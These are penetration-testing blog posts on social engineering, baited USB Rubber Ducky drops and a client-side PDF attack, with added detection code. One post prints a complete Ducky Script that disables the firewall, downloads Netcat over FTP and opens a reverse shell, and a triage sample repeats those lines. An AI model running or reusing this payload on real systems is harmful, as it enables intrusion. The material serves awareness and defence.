January 29, 2016

We have just completed a Social Engineering Assessment for one of our U.S. clients, the first one in 2016. The company (a strong, well-established, medium-sized business) had done a lot of Penetration Testing audits over the years and a Spear Phishing Test as well, but had never undergone a Social Engineering audit.

So they engaged us and asked us to pay special attention to whether employees would give out usernames and passwords if socially engineered. The results were shocking. Not because users fell for classic social engineering techniques (such as claiming to be from the IT Dept. or posing as a manager or a trusted 3rd party). No, it was far worse. Employees were asked, by email and in person, to give out usernames and passwords in return for something. For new hires and junior members, a $50 Amazon gift voucher did the trick in 7 out of 10 cases.

The classic email phishing was very successful. When we claimed to be a manager, people seemed to have no problem sending their Active Directory login by email or even via LinkedIn message. Out of 500 phishing emails, more than 400 were answered by employees with username/password pairs.

The best IT Security doesn’t protect anything if employees happily hand it out.

It’s shocking. If we, with the permission of the client, get such high results, imagine what a determined competitor or hacking group could do. Security policies are there for a reason. People wouldn’t put their car keys into an envelope and send them to an alleged address of a co-worker, so why do people still not understand that a username/password is as valuable as the keys to all the office buildings?

A lot of training and education is still needed in this field…


December 23, 2015

Some customers think that the USB threat may have gone away with Windows 7, where autoplay/autorun is disabled by default. While this is true for most standard USB attack vectors, it doesn’t apply to USB Rubber Ducky attacks.

What’s the difference?

The USB Rubber Ducky attack works differently in that it doesn’t execute an exe or similar file; it emulates an external keyboard, which is not flagged as malicious activity or as a virus by AV or endpoint protection. It’s like plugging in an external keyboard, but rather than a user typing in the commands, the Rubber Ducky types a set of commands instead.
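Because the device is a keyboard to the OS, the one thing it cannot hide is its cadence: it types far faster and far more evenly than a person. The following is an added example (not code from the original post or from the device's vendor) of a keystroke-timing heuristic a host agent could use to spot injected input; the thresholds and the sample timings are constructed assumptions for the demo.

```python
from statistics import pstdev

# Thresholds are assumptions for the demo, not figures from the original post.
MAX_INJECT_GAP_S = 0.02   # humans rarely sustain gaps under 20 ms for long
MIN_RUN_LEN = 12          # consecutive fast keys needed to call it a burst
MAX_JITTER_S = 0.005      # injected keys arrive with almost no timing variance

def find_injection_bursts(timestamps):
    """Return (start_index, length) for each run of MIN_RUN_LEN or more keystrokes
    whose gaps are all <= MAX_INJECT_GAP_S and almost constant. Input is a list of
    monotonic key-down times in seconds."""
    bursts, run_start = [], 0
    for i in range(1, len(timestamps) + 1):
        fast = i < len(timestamps) and timestamps[i] - timestamps[i - 1] <= MAX_INJECT_GAP_S
        if not fast:                       # run covers indices run_start .. i-1
            run_len = i - run_start
            if run_len >= MIN_RUN_LEN:
                gaps = [timestamps[k] - timestamps[k - 1] for k in range(run_start + 1, i)]
                if pstdev(gaps) <= MAX_JITTER_S:
                    bursts.append((run_start, run_len))
            run_start = i
    return bursts

def human_typing(n, start=0.0):
    """Constructed human cadence: 80-250 ms between keys, irregular."""
    gaps = [0.08, 0.14, 0.21, 0.11, 0.25, 0.09, 0.17]
    out, t = [], start
    for k in range(n):
        out.append(t)
        t += gaps[k % len(gaps)]
    return out

def ducky_typing(n, start=0.0, gap=0.01):
    """Constructed injection cadence: a fixed 10 ms between keys."""
    return [start + k * gap for k in range(n)]

# A user types a few keys, then 33 keys (the length of one STRING line from the
# script below) land at device speed, then the user resumes.
SAMPLE = human_typing(8) + ducky_typing(33, start=5.0) + human_typing(5, start=9.0)

if __name__ == "__main__":
    print(find_injection_bursts(SAMPLE))   # [(8, 33)]
```

A real agent would read the timestamps from the HID event stream and, on a burst, block input from that device and raise an alert rather than just print.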

The following raw Ducky Script (prior to compiling) simply connects to an FTP server, downloads Netcat and then sends a shell to a specified IP and port.

DELAY 10000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
DELAY 2000
STRING echo open ftp.something.com 21 > ftp.txt
ENTER
DELAY 100
STRING echo user@something.com>> ftp.txt
ENTER
DELAY 100
STRING echo password>> ftp.txt
ENTER
DELAY 100
STRING echo bin >> ftp.txt
ENTER
DELAY 100
STRING echo get nc.exe >> ftp.txt
ENTER
DELAY 100
STRING echo bye >> ftp.txt
ENTER
DELAY 100
STRING ftp -s:ftp.txt
ENTER
STRING del ftp.txt & exit
ENTER
DELAY 2000
GUI r
DELAY 200
STRING nc -nv X.X.X.X 3333 -e cmd.exe
ENTER
DELAY 2000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING exit
ENTER
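
When a script like the one above is recovered during an incident, the first job is to reconstruct what the device would actually have typed. This is an added example (not the post's or the vendor's code) of a small triage parser for that format; the indicator patterns and the shortened sample script are constructed for the demo, with ftp.example.com and 192.0.2.1 as documentation placeholders.

```python
import re

# Indicator patterns are my own assumptions for the demo, not from the post.
INDICATORS = {
    "firewall_disabled": re.compile(r"\bnetsh\s+(advfirewall|firewall)\s+set\b.*\b(disable|off)\b", re.I),
    "ftp_scripted_download": re.compile(r"\bftp\s+-s:", re.I),
    "netcat_reverse_shell": re.compile(r"\bnc(\.exe)?\b.*\s-e\s", re.I),
}

def parse_ducky(script):
    """Reconstruct typed lines; GUI <key> kept as a pseudo-line. Returns (lines, total_delay_ms)."""
    lines, current, total_delay = [], "", 0
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.upper().startswith("REM"):
            continue                      # comments and blank lines
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "STRING":
            current += arg                # text accumulates until ENTER
        elif cmd == "ENTER":
            lines.append(current)
            current = ""
        elif cmd == "DELAY":
            total_delay += int(arg)       # dwell time the attack needs on the host
        elif cmd == "GUI":
            lines.append(f"<GUI {arg}>")  # Run-dialog hop; other modifier keys ignored here
    if current:
        lines.append(current)
    return lines, total_delay

def triage(script):
    """Return reconstructed lines, total delay and (line_no, indicator) hits."""
    lines, delay = parse_ducky(script)
    hits = [(n, name) for n, text in enumerate(lines)
            for name, pat in INDICATORS.items() if pat.search(text)]
    return {"lines": lines, "total_delay_ms": delay, "findings": hits}

# Constructed, shortened sample in the same format as the script above.
SAMPLE = """
DELAY 1000
GUI r
STRING netsh firewall set opmode disable
ENTER
STRING ftp -s:ftp.txt
ENTER
STRING nc -nv 192.0.2.1 3333 -e cmd.exe
ENTER
"""
```

Running `triage(SAMPLE)` reports the firewall change, the scripted FTP fetch and the Netcat line as separate findings, which is enough to scope what to look for in firewall and proxy logs.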

We were recently engaged by a Fortune 500 company for a Pentest. They had sound defenses in place, yet their laptops were compromised that way and a lot of juicy information could be harvested. FireEye, McAfee ePO and all the endpoint defenses they had in place couldn’t stop users plugging in a Rubber Ducky, especially not when the Rubber Ducky is labeled “CEO salaries 2015”, “free Amazon vouchers” or “free Expedia vouchers”. 8/10 USBs were plugged in and 8/10 shells were received.

The company has security in place and employees are taught not to plug in unknown devices, but hey… curiosity and the opportunity to get something for free beat any security policy…

For folks interested in the USB rubber ducky, here is the link:
http://hakshop.myshopify.com/collections/usb-rubber-ducky/products/usb-rubber-ducky-deluxe?variant=353378649


Social Engineering always wins

Author: Martin Voelk
April 19, 2015

As IT systems become more and more hardened, many script kiddies turn to easier alternative methods, mainly Social Engineering. Social Engineering exploits the weaknesses of the human layer, be it getting someone to reveal a password over the phone, clicking on a “free voucher PDF” to win something or simply holding the door open for someone they don’t even know. The possibilities are endless and unfortunately the success rates are 95% – 100%. Kevin Mitnick himself says: There is no cure for stupidity.

We try to educate our customers and employees as best we can, but in every Penetration Testing engagement our clients ask us to do, we have at least 1 success due to social engineering techniques. Whenever people think they can win a $20 voucher or get anything for free, they will almost always click a malicious PDF that just arrived in their inbox, no matter how spammy it may look. People will almost always plug in a USB stick when they receive a free one from a nice stranger. People will almost always believe that IT Support is really on the other end of the phone. The list goes on and on.

Here is an interesting article from the world-famous Kevin Mitnick:

http://recode.net/2015/03/26/why-kevin-mitnick-the-worlds-most-notorious-hacker-is-still-breaking-into-computers/


April 5, 2015

Social Engineering is responsible for most breaches; the human factor remains the weak link.

http://www.azcentral.com/story/money/business/tech/2015/04/03/security-breaches-involve-human-error/70872872/


March 21, 2015

We have been using these in our assessments for quite a while, but we are still impressed by how easy it is to compromise complete networks just by someone plugging in this USB stick as part of a social engineering assessment.

Back in the day an executable file was placed on a USB stick and, once plugged into a machine, auto-run executed it. Microsoft has since disabled auto-run on newer OS versions, so you rely on users to click or open a payload, it must be crafted for the exact OS and so on. A pain.

Not with the Rubber Ducky. The Rubber Ducky recently helped us to compromise a lot of MacBooks at an audit, along with Microsoft Windows 8 machines and admin Linux desktops. Why is it so easy? Well, because the Rubber Ducky emulates a keyboard rather than executing a program. That means that to the machine the Ducky is inserted in, it’s like a user typing things: enabling the camera from the CLI, opening a reverse shell. This is what makes it so hard for OSes to defend themselves against it.

We recently did a social engineering audit at a large insurance company. One of our ladies simply went to the non-restricted coffee break-out area at the reception and put out 10 USB sticks with different tags on them such as: GRAB ME – I AM FREE, MANAGEMENT CONFIDENTIAL or LATEST 2015 EMPLOYEE PAYROLL. Guess what? All 10 USBs were taken within 15 minutes and only 2 hours later 8 of the 10 employees who took this “free gift” had inserted it into their machines and opened them up to us via reverse shell.

This once again shows that no defense is of any use if employees plug in USBs they find in the coffee area. Now this was a large insurance company. Imagine private users in a Starbucks? Scary.

These things cost around $45 USD each. Imagine a real hacking group purchasing 100 of them for malicious purposes.

We can only warn again and again: don’t plug any USB sticks into your devices, especially not ones where you don’t know where they came from!

http://usbrubberducky.com


Security issues in Latin America

Author: Martin Voelk
December 11, 2014

We have quite a few government and private industry customers in Latin America. We are used to the fact that security is by far not as advanced as in the U.S. or Europe, but what we encountered recently in 3 different Latin American countries is scary. We won’t mention the countries specifically as we do not want to provide any further details, but as we have a lot of readers from Latin America, this little post should serve as an eye-opener.

Pirated Operating Systems

In many Latin American countries you can simply buy any Operating System, such as Windows, on a street market, and many governments there don’t have laws against this or don’t enforce them at all. No one should do this, but so many individuals and businesses do. The problem is that a lot of those cracked OS versions have built-in backdoors which automatically expose the machine on installation, and people don’t realise it.

Windows XP

Despite Microsoft’s end of sale / support / patching for Windows XP, we found XP to be the most widely deployed OS in many Latin American countries. This is a hacker’s dream: high-class remote and client-side exploits are available and Microsoft won’t patch any more. Bad enough if private persons still use it; shocking that governments still have it in use.

The USB enforcement

Many of the countries in LATAM now try to move taxation duties online. Nice idea, but where is the security? One example is that business owners in certain countries in LATAM have to go to the tax office with their report sheets in electronic format. You can guess where this is going… yes. They expect people to put it on a USB stick which the admin ladies then plug into their Windows XP systems. That cries out for a client-side exploit, with auto-run enabled on Windows XP by default.

There are very few security companies operating in Latin America. IT Security is widely neglected. Everyone understands the need for physical security, CCTV, barbed wire etc., but when it comes to online security even governments fail at the basics. We try to play our part in consulting and making at least our customers more secure, but it’s a drop in the ocean, so we hope that if people from Latin America read this article they may take IT Security a bit more seriously.


November 30, 2014


November 30, 2014


November 27, 2014

This is from a real-world Pentest conducted for a customer this week. First of all, what is a client-side attack? It requires the user to take some action (like browsing to a website or trying to view an Excel, PowerPoint or PDF document etc.).

The customer tasked us to look for any breach possibility outside the standard server and perimeter Pentesting. Without going into too much technical detail, we were once again shocked at how easy it would be for real hackers to breach corporate security.

We won’t disclose all tools and methods but just want to share a high-level overview with our readers as an eye-opener.

Step 1: After figuring out that Windows 7 runs on employees’ laptops, we created a crafted PDF document, backdoored it and disguised it from common Antivirus detection (tested on virustotal.com).

Step 2: Captured 10 email addresses from the organisation via some Google search operators

Step 3: Set up a TCP listener on a server on port 443

Step 4: Sent out crafted spoofed emails between employees which enticed them to open the important PDF

Step 5: Once clicked, an outbound SSL tunnel from victim to server was established

Step 6: 8 mails were sent and 5 machines were compromised in less than 1 hour

Step 7: After the sessions were migrated to a persistent Windows system process, privilege escalation to Admin was not a challenge

Whilst we spent 10 days Pentesting our customer’s server farms before eventually finding a vulnerability, the client-side attack took less than 2.5 hours all in.

Don’t think your IT is protected just because you run the latest and well-known Anti Virus software.

What could have prevented this? SSL inspection of outbound traffic and deep packet inspection of emails and attachments (hopefully), but even some IPS systems we tested are prone to source code changes of the malicious payload and give no full guarantee of detection unless anomaly-based detection is being used.
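Anomaly-based detection on the endpoint has an easier time here than signature-based AV, because the behaviour in Step 5 is unusual for a document reader regardless of what the payload looks like. The following is an added example (not the post's code or the customer's tooling) of that rule logic run over constructed Sysmon-style events; the process names, the sample log and 198.51.100.7 (a documentation address) are assumptions for the demo.

```python
import json

# Which processes count as document readers / shells is an assumption for the demo.
READERS = {"acrord32.exe", "acrobat.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}

def _basename(path):
    """Last path component, lower-cased, so rules match regardless of install dir."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def load_events(text):
    """Parse JSON-lines into dicts (one Sysmon-style event per line)."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def detect(events):
    """Return (rule_name, event) for every event matching a rule.
    Rule 1: a document reader opens an outbound connection (EventID 3).
    Rule 2: a document reader spawns a scripting host or shell (EventID 1)."""
    alerts = []
    for ev in events:
        image = _basename(ev.get("Image", ""))
        parent = _basename(ev.get("ParentImage", ""))
        if ev.get("EventID") == 3 and image in READERS:
            # Production rules would allowlist the vendor's update/licensing hosts.
            alerts.append(("reader_outbound_connection", ev))
        elif ev.get("EventID") == 1 and parent in READERS and image in SHELLS:
            alerts.append(("reader_spawned_shell", ev))
    return alerts

# Constructed sample log, not data from the engagement. Raw string, so the
# backslashes are doubled exactly as JSON requires.
SAMPLE_LOG = r"""
{"EventID": 1, "Image": "C:\\Program Files\\Adobe\\AcroRd32.exe", "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 3, "Image": "C:\\Program Files\\Adobe\\AcroRd32.exe", "DestinationIp": "198.51.100.7", "DestinationPort": 443}
{"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files\\Adobe\\AcroRd32.exe"}
{"EventID": 3, "Image": "C:\\Program Files\\Google\\Chrome\\chrome.exe", "DestinationIp": "198.51.100.7", "DestinationPort": 443}
"""

if __name__ == "__main__":
    for rule, ev in detect(load_events(SAMPLE_LOG)):
        print(rule, ev["Image"])
```

The first event (Explorer launching the reader) and the browser's own connection stay silent; only the reader's outbound 443 connection and the shell it spawned are flagged.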


November 27, 2014

Companies these days realise the need for Firewalls and IPS, so hackers more and more turn their attention elsewhere – the human. In all social engineering attacks we have performed this year alone, we have a staggering success rate of 98%. In other words, in 98% of cases users entered their credentials into a portal which they believed was the portal they were trying to log in to.

Almost every user happily associates to an Access Point which broadcasts their company name and happily becomes a man-in-the-middle victim, including SSL stripping. 8 out of 10 users plug any USB stick into their private or company laptops if it’s labeled “confidential”. 9 out of 10 users open PDFs and Excel files with malicious payloads if they think a friend or the boss sent them. If company security kicks in, still 4 out of 10 email the PDF to their private Yahoo or Gmail account.

If users are asked “Java needs to run in the browser – do you accept?”, they click yes and thereby create a tunnel back to the attacker. Spoofed phone numbers, SMS and emails are usually only the first step to complete data exposure. Almost all employees accept the CEO or a Board member on LinkedIn (wow, the CEO just added me). No one even thinks that the “CEO” could be a fake profile from a hacker. Building trust with employees, asking for confidential information and getting this information within 5 days is commonplace.

We have been conducting Security Audits for customers for years, but even our team gets surprised again and again at how easy it is to obtain information from employees, and the best Firewall can’t do anything against it. Have a think about where you click and who you answer to! It may not always be the person you think!

We have created a Cyber Security Awareness Training for ordinary non-technical IT Users.

http://www.pentestcoach.com/it-security-user-awareness-training/
